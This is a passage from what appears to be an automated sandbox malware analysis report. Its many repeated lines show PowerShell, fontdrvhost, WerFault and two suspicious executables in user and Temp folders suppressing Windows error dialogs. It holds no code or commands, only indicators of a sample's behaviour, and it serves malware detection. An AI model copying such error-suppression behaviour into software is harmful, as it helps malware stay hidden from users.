                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
